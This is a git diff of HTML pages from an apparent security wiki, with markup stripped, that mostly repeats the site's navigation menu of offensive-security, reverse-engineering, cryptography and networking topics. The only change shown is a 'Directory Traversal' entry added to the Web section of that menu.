        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -215,22 +215,6 @@

IV Reuse Atta - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html index 180550fa..d857d9a2 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/Electronic Cookbook (ECB) Mode.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -204,22 +204,6 @@

Sec - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html index 953de783..95accb30 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Modes of Operation/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
